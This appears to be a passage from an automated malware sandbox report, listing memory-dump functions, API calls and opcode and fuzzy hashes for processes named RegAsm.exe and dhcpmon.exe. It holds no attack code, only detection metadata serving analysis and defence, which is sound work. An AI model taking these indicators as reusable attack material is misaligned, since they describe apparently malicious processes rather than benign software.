                                • Instruction Fuzzy Hash: 84B1D070B043008FDB24DB78D8447AEBBF2EF89218F148969D506AB391DB74EC06CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04809D00, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04809D78
                                Memory Dump Source
                                • Source File: 0000000E.00000002.931164857.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 41b4f2f94212141a8aaf60caa1d77ca70348cb765a026dce15d5d6628510aeb3
                                • Instruction ID: 19561c37349be8a2eaafd369ee0623421bea88519a5dc24d9f39f0cd19e83672
                                • Opcode Fuzzy Hash: 41b4f2f94212141a8aaf60caa1d77ca70348cb765a026dce15d5d6628510aeb3
                                • Instruction Fuzzy Hash: E62133B1D006599BCB10CF9AD844B9EFBB4FF49724F10862AD819A7640D774AA04CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048076AC, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04809D78
                                Memory Dump Source
                                • Source File: 0000000E.00000002.931164857.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 45bfe30dc012c8f950b7913d033022e0458dd39ad89bfe9b4f3a476b0a758c86
                                • Instruction ID: df3844c8f29792567823b0d048c62f90325611a73192c9a7c3b6025163e03c16
                                • Opcode Fuzzy Hash: 45bfe30dc012c8f950b7913d033022e0458dd39ad89bfe9b4f3a476b0a758c86
                                • Instruction Fuzzy Hash: 322133B1D046599BCB10CF9AD844B9EFBF4FB49314F04862AE819B7640D774A904CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04809DB0, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04809D78
                                Memory Dump Source
                                • Source File: 0000000E.00000002.931164857.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 5c7a44e10fc1a76e849f51afb373f56e086c3f6d521556c32a30ba1fdec9c870
                                • Instruction ID: a83470a3d06f716e339041dfc65291fcfa1189f5985b124481bd30e8b756a2fe
                                • Opcode Fuzzy Hash: 5c7a44e10fc1a76e849f51afb373f56e086c3f6d521556c32a30ba1fdec9c870
                                • Instruction Fuzzy Hash: F10126309082459FCB41DB28D8406C9FFB4AF4521CF15CA96E148DB166D3B4A956CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D9ED8, Relevance: .2, Instructions: 190COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c8d7c1b7056a9a11c38ec87a191eaadbc02568dbf51fd37d377338fae97ad314
                                • Instruction ID: fd616aec0e6556c4b0e95b4ad95e0a3c3a500110362125c69a64d4497a5a441e
                                • Opcode Fuzzy Hash: c8d7c1b7056a9a11c38ec87a191eaadbc02568dbf51fd37d377338fae97ad314
                                • Instruction Fuzzy Hash: 18716B70A002199FCB14DF68D980AADBBF2FF89318F15C569E405AB761DB71EC45CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D1B68, Relevance: .1, Instructions: 137COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 455767159f8995c7aeea5611b92ddc5df640df83a4832c18d5cf4bb4f3b9141d
                                • Instruction ID: e8398220bf2911b91b44d48466b289d0f331b69d1795e61517d26b25050a58de
                                • Opcode Fuzzy Hash: 455767159f8995c7aeea5611b92ddc5df640df83a4832c18d5cf4bb4f3b9141d
                                • Instruction Fuzzy Hash: 76417A713082544F8744AB7DA89046E7796DFC112931285BAC64ACB79ADF70DC0983F1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D27C8, Relevance: .1, Instructions: 122COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9dfe10690d1b51bf5af573578c05a74d2acc68cc38f93b8ebdb43c22cd523a60
                                • Instruction ID: 3130c019316b5acb1e2b7cc3c388211c0db17ed6404eff915496c2c706987c08
                                • Opcode Fuzzy Hash: 9dfe10690d1b51bf5af573578c05a74d2acc68cc38f93b8ebdb43c22cd523a60
                                • Instruction Fuzzy Hash: 22417E74B101059FDB04DF68D454A6EBBABFF89318F108469E906CB391CB75ED058BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079DE5F0, Relevance: .1, Instructions: 117COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 499e46bcd8ddae64667585e4d9898913d10bbebf83d0e06a999ae467a660268a
                                • Instruction ID: 0dcd44020ab2bea280f0ac5e3b5fff39a9dc8a36e3dac21066713b7e61143264
                                • Opcode Fuzzy Hash: 499e46bcd8ddae64667585e4d9898913d10bbebf83d0e06a999ae467a660268a
                                • Instruction Fuzzy Hash: 694168B4E00209CFDB54DFA8D444AEDB7F6AF88308F148429D806AB390DB74AC45CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D25C8, Relevance: .1, Instructions: 107COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0649369bde7961f6fcc15782e9219ef9840258edb559fe980cca6d86a3838b7d
                                • Instruction ID: 14083b1a284b264af6753ce6ec40fe236befabfb7e6502c267d39a61c32f9364
                                • Opcode Fuzzy Hash: 0649369bde7961f6fcc15782e9219ef9840258edb559fe980cca6d86a3838b7d
                                • Instruction Fuzzy Hash: 08413B75E012299BDB14DBA8D958AADBBB6FFC8309F148419E501BB394DB749C018B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D0778, Relevance: .1, Instructions: 99COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 88efc2793629880af6aba934d9058fa533b7afa245eff6adbc9fc0e0ea150241
                                • Instruction ID: 3e8352380a57cd3bdc74a7150f17a65558b8d65e5f018dfb52f761fe6ee57fe5
                                • Opcode Fuzzy Hash: 88efc2793629880af6aba934d9058fa533b7afa245eff6adbc9fc0e0ea150241
                                • Instruction Fuzzy Hash: AE41CAB0A012009FD755DF68D444BAEBBB2FF89304F1589ACC406AB781CB70AD49CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D0788, Relevance: .1, Instructions: 95COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6791f017829f148dd27b841798efcde76a8549d971bfcae4d8dc8df28adcd725
                                • Instruction ID: 69fce8e47096c873360cab4f5772c3f27ba548ec864b126b3c29999b73fac884
                                • Opcode Fuzzy Hash: 6791f017829f148dd27b841798efcde76a8549d971bfcae4d8dc8df28adcd725
                                • Instruction Fuzzy Hash: 5331BAB0A012149FDB54DFA8C444BAEBBB6FF88304F158968D406AB784CB71AD45CFE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D9FC7, Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbc7f1e894434759d7bcc73369c4a2f66161b9108184d01a65ecc24216f31989
                                • Instruction ID: 984a5ec7893d6cb92dcd5914177ee578ca636763d344fc20af88557e7266270a
                                • Opcode Fuzzy Hash: cbc7f1e894434759d7bcc73369c4a2f66161b9108184d01a65ecc24216f31989
                                • Instruction Fuzzy Hash: 4E314874A00218DFCB14DFA8D994E9DBBF6FF89218F158169E406AB361CB71EC05CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D9FC0, Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3cc34b633ba2e3604dfb908a34dda1a6d80172d8e6bd766e468540ae73eaaeab
                                • Instruction ID: 984a5ec7893d6cb92dcd5914177ee578ca636763d344fc20af88557e7266270a
                                • Opcode Fuzzy Hash: 3cc34b633ba2e3604dfb908a34dda1a6d80172d8e6bd766e468540ae73eaaeab
                                • Instruction Fuzzy Hash: 4E314874A00218DFCB14DFA8D994E9DBBF6FF89218F158169E406AB361CB71EC05CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D9FCE, Relevance: .1, Instructions: 83COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f52fcaab199ee2ba61920eb36f0260d9afde259ded8b4ca82e7f719c741eb2c4
                                • Instruction ID: 012956f05f2afd007dc8a9c9ac051f7faf1227c2817cdfc9953752200c3208af
                                • Opcode Fuzzy Hash: f52fcaab199ee2ba61920eb36f0260d9afde259ded8b4ca82e7f719c741eb2c4
                                • Instruction Fuzzy Hash: 75314A74A00218DFCB14DFA8D894E9DB7F6FF89218F158164E406AB361CB31EC05CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D2209, Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dce42abf5904faabb607afa47c11aa7660ad0eef683ca451d5d26d5eafaa8e68
                                • Instruction ID: ba67998c37f1162d4b144256e0fee053cd82d5050e9f4eb05859ef0dcb9b868a
                                • Opcode Fuzzy Hash: dce42abf5904faabb607afa47c11aa7660ad0eef683ca451d5d26d5eafaa8e68
                                • Instruction Fuzzy Hash: 9621D830D0D3D64FCB43D77888240AE7FB1AE83214B1A85EBC094DF193D634190ACBA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D9EC8, Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a45e76d6b30cbd5d4434d6f5c9ed29d6f35a62a74b2b1baf8c893cc10c618eef
                                • Instruction ID: 6646cb8c0f5207bc18a93ce940b733d1f0d68bcd8870bf1cc16618742be56960
                                • Opcode Fuzzy Hash: a45e76d6b30cbd5d4434d6f5c9ed29d6f35a62a74b2b1baf8c893cc10c618eef
                                • Instruction Fuzzy Hash: CE215CB0D002198FCB44DFA8C940AEDBBB6EF89318F15C569C505EB255E731AD45CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D2E38, Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52349337ec965cf3a642a23f7974b374016c1f69031e4545f4758b31dba89f79
                                • Instruction ID: 763afcb22393c672a016be6d8119e9f39d6a638d4d4960aad91efd76cfcc3eab
                                • Opcode Fuzzy Hash: 52349337ec965cf3a642a23f7974b374016c1f69031e4545f4758b31dba89f79
                                • Instruction Fuzzy Hash: 54118F71A0021A9FCB00DF69E848AADBBB5FF88319B048965D605C7660DB71ED65CFD0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079DC0D0, Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e2626ff38f16e731121662ed320a680bbd0ceeeb5fcade5f0dbe152f10f95c94
                                • Instruction ID: f9b0e5015837378caa74f76b08fd618ba8494ed6f2fdb1c8dec9c166e3571d86
                                • Opcode Fuzzy Hash: e2626ff38f16e731121662ed320a680bbd0ceeeb5fcade5f0dbe152f10f95c94
                                • Instruction Fuzzy Hash: F12136B5D0061A9BCB10CF9AC444BEEFBF4FB48324F04812AE818A7640D778A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079DE974, Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a731147fc094f8f0f6371bef8cbb8143a35ef34c18f4cba4e8520b2eeeca83e7
                                • Instruction ID: 409a4216d3f5b96d71a403649bef3b7c3d81d8fb2dccb57de9d97477f8ad2e14
                                • Opcode Fuzzy Hash: a731147fc094f8f0f6371bef8cbb8143a35ef34c18f4cba4e8520b2eeeca83e7
                                • Instruction Fuzzy Hash: 6C2136B1C0065A9FCB10CF9AD444BEEFBF4FB48324F14812AE458A7640D778A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079DE8A0, Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f559dc3367cb03a1fa5a82df14aa0834ebd5a2635498f617e1c42989b75ddcee
                                • Instruction ID: 63773a4de9bae8feafb97b203f48c386f8ff0f96680a8609ea84d4ea54f54b55
                                • Opcode Fuzzy Hash: f559dc3367cb03a1fa5a82df14aa0834ebd5a2635498f617e1c42989b75ddcee
                                • Instruction Fuzzy Hash: FE01D4B2B156228BEB31DA79D4007B673DDDB41369F0484B6E84DCF790D669EC408790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079D88D8, Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: beb8ec21947d8f38bd7caef18a05e4b243fdc41332cc6819c6318198ef8b59c6
                                • Instruction ID: 0469a16ad370fe9e11e9f211fe1b6204572a262d774b45e67363b785faf089fc
                                • Opcode Fuzzy Hash: beb8ec21947d8f38bd7caef18a05e4b243fdc41332cc6819c6318198ef8b59c6
                                • Instruction Fuzzy Hash: 41F022313102006BC344FBA99C48A2FBBABDBC5615B40483CE609CB395DF71AC094BF4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079DDEB5, Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4eda605c6af39d7cb58417d74ae89af453bc89a037eec5d59cdb9bc73323503c
                                • Instruction ID: 2628137b7b59ae5c6d64740fb5dad23264c2b16263c2ec4c774b2545287d59a7
                                • Opcode Fuzzy Hash: 4eda605c6af39d7cb58417d74ae89af453bc89a037eec5d59cdb9bc73323503c
                                • Instruction Fuzzy Hash: D4E02636B102008FD340DB84E4417BEF363EF84324F00C939E11A83681CB78B8058F50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0795C86A, Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936217558.0000000007950000.00000040.00000001.sdmp, Offset: 07950000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4e285f5c9656e52c691c4594da5565589467d3d5bf2fd297a66010436d556017
                                • Instruction ID: f3888d5260e02f61ef1a5596add350f229879a9a9af4d11bc54d8504c8032e62
                                • Opcode Fuzzy Hash: 4e285f5c9656e52c691c4594da5565589467d3d5bf2fd297a66010436d556017
                                • Instruction Fuzzy Hash: 7FE0CD766102004BE740EB64E4452FDF397EB90315F008939D51687645DB7999054F61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Analysis Process: RegAsm.exe PID: 1476 Parent PID: 968 RegAsm.exeCOMMON

                                Executed Functions

                                Function 02AC189D, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                Download Yara Rule
                                APIs
                                • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 02AC1A4B
                                Memory Dump Source
                                • Source File: 00000012.00000002.841450747.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                Similarity
                                • API ID: PathSearch
                                • String ID:
                                • API String ID: 2203818243-0
                                • Opcode ID: 386d012082705937013f519cb315b0b2973a78c3bae4265f8b530874f488cc12
                                • Instruction ID: 72727339bb03ebf0c1bd4181463e2ff52cb458108f2effa0e96b2781465dd950
                                • Opcode Fuzzy Hash: 386d012082705937013f519cb315b0b2973a78c3bae4265f8b530874f488cc12
                                • Instruction Fuzzy Hash: 0A711470E002198FDB28CF99C994B9DBBF1BF48314F24812EE859A7351DB74A946CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02AC18A8, Relevance: 1.7, APIs: 1, Instructions: 165COMMON
                                Download Yara Rule
                                APIs
                                • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 02AC1A4B
                                Memory Dump Source
                                • Source File: 00000012.00000002.841450747.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                Similarity
                                • API ID: PathSearch
                                • String ID:
                                • API String ID: 2203818243-0
                                • Opcode ID: 3238e76b7960e5b453d60c8bc059bc451ae3e8b1617dc04b67b46ba769c6e0b5
                                • Instruction ID: 89a332143e598dd54f5644b1c5e404db6708489fc56e9c7c6bf3ad1561afaf3d
                                • Opcode Fuzzy Hash: 3238e76b7960e5b453d60c8bc059bc451ae3e8b1617dc04b67b46ba769c6e0b5
                                • Instruction Fuzzy Hash: 98711470E002198FDB28CF99C98479EBBF1BF48314F25812EE819A7351DB74A946CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Analysis Process: dhcpmon.exe PID: 5556 Parent PID: 968 dhcpmon.exeCOMMON

                                Executed Functions

                                Function 0306189D, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                Download Yara Rule
                                APIs
                                • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 03061A4B
                                Memory Dump Source
                                • Source File: 00000016.00000002.845441210.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false
                                Similarity
                                • API ID: PathSearch
                                • String ID:
                                • API String ID: 2203818243-0
                                • Opcode ID: 2d671fa65228b9c07bcdafcabd4968119c644397be5c1a05069f1064d75b1577
                                • Instruction ID: a08854dce813522c0f088f89c528b1938f4840c3eb24d46b8bbc98e0f3b6dab5
                                • Opcode Fuzzy Hash: 2d671fa65228b9c07bcdafcabd4968119c644397be5c1a05069f1064d75b1577
                                • Instruction Fuzzy Hash: 4B712470D012199FDB28CF99C984B9EFBF1BF48314F28812AE819AB354D734A945CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 030618A8, Relevance: 1.7, APIs: 1, Instructions: 165COMMON
                                Download Yara Rule
                                APIs
                                • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 03061A4B
                                Memory Dump Source
                                • Source File: 00000016.00000002.845441210.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false
                                Similarity
                                • API ID: PathSearch
                                • String ID:
                                • API String ID: 2203818243-0
                                • Opcode ID: 2b8cdeb1bf31a15e6aae4f354c1630aa727ffa1fb5d711d0dafba2433b58c61f
                                • Instruction ID: 3c930aae87087d67395ae5ff66afbdda44bf729210dc699f2285b8c08e247f7d
                                • Opcode Fuzzy Hash: 2b8cdeb1bf31a15e6aae4f354c1630aa727ffa1fb5d711d0dafba2433b58c61f
                                • Instruction Fuzzy Hash: 72711470D012199FDB28CF99C98479EFBF1BF48314F18812AE819AB354DB74A945CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions